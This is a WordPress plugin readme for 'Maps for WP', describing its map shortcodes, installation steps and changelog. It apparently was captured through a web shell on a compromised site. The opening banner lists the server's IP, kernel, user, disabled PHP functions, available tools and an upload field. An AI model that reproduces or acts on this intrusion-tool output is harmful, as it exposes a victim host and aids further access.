| Server IP : 89.108.64.180 / Your IP : 216.73.217.92 Web Server : Apache/2.4.41 (Ubuntu) System : Linux 89-108-64-180.cloudvps.regruhosting.ru 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : www-root ( 1010) PHP Version : 8.0.30 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/www-root/data/www/hotelvv.ru/wp-content/plugins/maps-for-wp/ |
Upload File : |
=== Maps for WP === Contributors: icopydoc Donate link: https://icopydoc.ru/donate/ Tags: yandex, google, maps, map, yandex maps Requires at least: 4.4.2 Tested up to: 5.2.3 Stable tag: 1.2.0 License: GPLv2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html A handy plugin for inserting Yandex and Google maps using shortcode. == Description == A handy plugin for inserting Yandex and Google maps using shortcode. = Adds Yandex or Google Map with one point = [MapOnePoint id="" type="" lon="" lat="" zoom="" h="" img="" thover="" tclick=""] * "id" (required) - unique id * "type" (not required) - map layer (roadmap, satellite, hybrid, terrain) * "lon" (required) - longitude of the center of the map * "lat" (required) - latitude of the center of the map * "mstyle" (not required) - style of maps (default, blackwhite, blackout, сolorinversion) * "h" (not required) - Map height in pixels * "img" (not required) - URL image markers * "thover" (not required) - Text when pointing to a point * "tclick" (not required) - Text when clicking on a point Example: `[MapOnePoint id="m1" type="hybrid" lon="55.75197479670444" lat="37.617726067459024" zoom="5" h="200" img="http://site.ru/1.png" thover="Text when pointing to a point" tclick="Text when clicking on a poin. Some text"]` = Adds Yandex or Google map with many points = [MapManyPoints id="" type="" lat="" lon="" zoom="" h="" img="" points=""] * "id" (required) - unique id * "type" (not required) - map layer (roadmap, satellite, hybrid, terrain) * "lon" (required) - longitude of the center of the map * "lat" (required) - latitude of the center of the map * "mstyle" (not required) - style of maps (default, blackwhite, blackout, сolorinversion) * "h" (not required) - Map height in pixels * "img" (not required) - URL image markers * "points" - [lat point 1],[lon point 1],[text on hover 1],[text on click 1];[lat point 2],[lon point 2],[text on hover 2],[text on click 2] and so on... Example: `[[MapManyPoints id="m2" type="roadmap" lat="25" lon="30" zoom="2" h="250" points="25,-1,Text on hover this point, Text on click this point;-5,13,Text on hover this point, Text on click this point"]` == Installation == This section describes how to install the plugin and get it working. 1. Upload the entire `yandex-maps-for-wp` folder to the `/wp-content/plugins/` directory. 1. Activate the plugin through the 'Plugins' screen in WordPress 1. Use the Yandex Maps->Settings screen to configure the plugin 1. Add the shortcode (`[MapOnePoint]` or `[MapManyPoints]`) to the page topic == Frequently Asked Questions == = Is it possible for one page to contain 2 of the shortcode [OneManyPoints]? = Yes. These shortcodes can be an unlimited number. Provided that the parameters 'id' are different. = Is it possible for one page to contain 2 of the shortcode [MapManyPoints]? = Yes. == Screenshots == 1. screenshot-1.png == Changelog == = 1.2.0 = * Added map styles = 1.1.5 = * Fix bugs. = 1.1.4 = * Fix bugs. = 1.1.3 = * Fix bugs. = 1.1.2 = * Fix bugs. = 1.1.1 = * Fix bugs. = 1.1.0 = Important: Version 1.1. not compatible with previous versions! It is not recommended to update the plugin from version 1.0.2! * Fix bugs. * Fixed plugin settings. * Completely modified code. * Added support for Google Maps! * Changed the logic of the shortcode `[MapManyPoints]`. = 1.0.2 = * Fixed plugin settings. = 1.0.1 = * Fixed a bug in which maps appear at the top of the page. = 1.0.0 = * First relise. == Upgrade Notice == = 1.2.0 = * Added map styles